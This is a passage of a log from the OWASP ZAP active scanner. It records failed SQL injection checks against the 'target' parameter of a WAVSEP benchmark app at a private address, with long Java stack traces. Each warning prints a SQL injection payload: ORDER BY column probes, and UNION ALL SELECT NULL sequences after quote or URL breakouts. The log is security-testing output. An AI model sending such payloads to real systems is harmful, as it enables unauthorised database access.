org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681397 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681398 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 4137-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' ORDER BY 4137-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681398 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681399 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681400 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681400 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681402 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681402 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681403 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681404 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681405 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681406 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681407 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) 